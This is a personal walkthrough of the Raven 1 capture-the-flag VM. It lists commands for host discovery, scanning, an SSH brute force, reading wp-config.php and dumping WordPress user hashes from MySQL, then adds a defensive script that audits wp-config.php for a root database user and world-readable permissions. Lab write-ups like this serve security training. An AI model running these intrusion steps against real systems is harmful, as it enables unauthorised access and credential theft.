/Raven_1-CTF

Personal Walkthrough; super spoiler alert!

1:
Find the IP of the target machine by using:
 
        netdiscover -i <interface> -r <Ip>/24 

Take the IPs from the results and put them in a text file called IPs.txt

2:
Port scan the IPs
      
      nmap -F -iL <directory path>/IPs.txt 

Use this to find the target machine. We will call it <IP> from here on, because the numbers can differ depending on VM settings.
      
3: 
Nmap will reveal that port 80 is open so naturally

      nikto -h http://<IP>/
      
4:
nikto will show that WordPress is installed

5:
Inspect Elements on <IP>/services.html to find flag1

6:
Run wpscan against the <IP>/wordpress/ site. Check out the commands folder for the specific command.

7:
Attack the SSH protocol with the usernames list you found. Use Hydra; check the commands folder for the specific command.

8: 
Now you have michael's creds

        ssh michael@<IP> 
          password: <you should know it from earlier; won't be that easy>
          
9: 
Now we are in 

        cd /var/www/
        ls -l 
        cat flag2
        
10:
Read the WordPress config file for the DB info

        michael@Raven:~$ cat /var/www/html/wordpress/wp-config.php

11: 
Hopefully we have realized by now that WordPress itself only controls serving the web pages and directory, so there is a DB behind it as well, and the config file gives us the info for it.
And what other DB to check for than the infamous MySQL?

      mysql -u root -p
      password: <use the password from the config file we read in step 10>
      
12:
Now that you have signed into the MySQL server you should have the mysql> command line

  A: 
    mysql> show databases;
  B:
    mysql> use wordpress;
  C: 
    mysql> show tables;
  D:
    mysql> select * from wp_users; # gives the hashes for users BUT!!!!
  E!: 
    mysql> select * from wp_users;
    
     That will give you flags 3 and 4, and that's it: all 4 flags found, with root access to the DB. That's mission complete!
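
Steps 10 and 11 work because wp-config.php can be read from an unprivileged login and WordPress connects to MySQL as root. The script below is an added example, not part of the original walkthrough or the commands folder: it audits a wp-config.php for both conditions. The function names, the sample file and the assumption that the file is exposed through world-readable permissions are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the walkthrough: audit wp-config.php for the two
# conditions steps 10-11 depend on. Sample file and values are constructed.

# audit_wp_config <path>: prints one FINDING line per problem.
# Returns 0 when clean, 1 when there are findings, 2 when the file is unreadable.
audit_wp_config() {
    cfg=$1; findings=0
    [ -r "$cfg" ] || { echo "ERROR: cannot read $cfg" >&2; return 2; }

    # Extract the value from a line like: define('DB_USER', 'name');
    db_user=$(sed -n "s/^[[:space:]]*define([[:space:]]*['\"]DB_USER['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p" "$cfg" | head -n 1)
    if [ "$db_user" = "root" ]; then
        echo "FINDING: DB_USER is root; use a MySQL account limited to the WordPress database"
        findings=$((findings + 1))
    fi

    # Octal permission bits: GNU stat first, BSD stat as fallback.
    mode=$(stat -c '%a' "$cfg" 2>/dev/null || stat -f '%Lp' "$cfg")
    case "$mode" in
        *[4567])  # last digit is the "other" class; the 4 bit means readable
            echo "FINDING: $cfg is world-readable (mode $mode); restrict it to the web server user"
            findings=$((findings + 1)) ;;
    esac
    [ "$findings" -eq 0 ]
}

# Runs the audit against a constructed config that has both weaknesses.
demo() {
    tmpdir=$(mktemp -d)
    cat > "$tmpdir/wp-config.php" <<'EOF'
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'constructed-placeholder');
define('DB_HOST', 'localhost');
EOF
    chmod 644 "$tmpdir/wp-config.php"
    audit_wp_config "$tmpdir/wp-config.php"
    rc=$?
    rm -rf "$tmpdir"
    return "$rc"
}

demo || true
```
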